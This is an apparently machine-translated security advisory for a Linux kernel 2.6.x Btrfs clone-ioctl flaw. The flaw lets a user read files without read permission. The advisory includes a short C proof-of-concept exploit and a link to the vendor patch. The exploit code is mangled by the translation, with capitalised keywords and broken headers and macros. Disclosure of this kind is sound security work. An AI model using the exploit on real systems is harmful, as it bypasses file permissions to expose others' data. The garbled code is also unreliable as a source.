Affected Versions:
Linux kernel 2.6.x
Vulnerability description:
Linux Kernel is the Kernel used by open source Linux.
In the Btrfs Implementation of Linux Kernel, btrfs_ioctl_clone () ioctl copies the source file descriptor provided by the user to the target file descriptor, but does not check whether the source file descriptor has been opened and read before the copy operation is executed, this allows attackers to read cloned files without having the read permission. <* Reference
Https://bugzilla.redhat.com/show_bug.cgi? Format = multiple & amp; id = 593226
Https://bugs.launchpad.net/ubuntu/+source/linux/+bug/579585
*>
Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! # Include <fcntl. h>
# Include <sys/ioctl. h>
# Include <stdio. h>
# Include <stdlib. h>
# Define BTRFS_IOC_CLONE _ IOW (0x94, 9, int)
Int main (int argc, char * argv [])
{
If (argc <3 ){
Printf ("Usage: % s [target] [output]", argv [0]);
Exit (-1 );
}
Int output = open (argv [2], O_WRONLY | O_CREAT, 0644 );
/* Note-opened for writing, not reading */
Int target = open (argv [1], O_WRONLY );
Ioctl (output, BTRFS_IOC_CLONE, target );
}
Security suggestions:
Vendor patch:
Linux
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://git.kernel.org /? P = linux/kernel/git/torvalds/linux-2.6.git; a = commitdiff; h = 5dc6416414fb3ec6e2825fd4d20c8bf1d7fe0395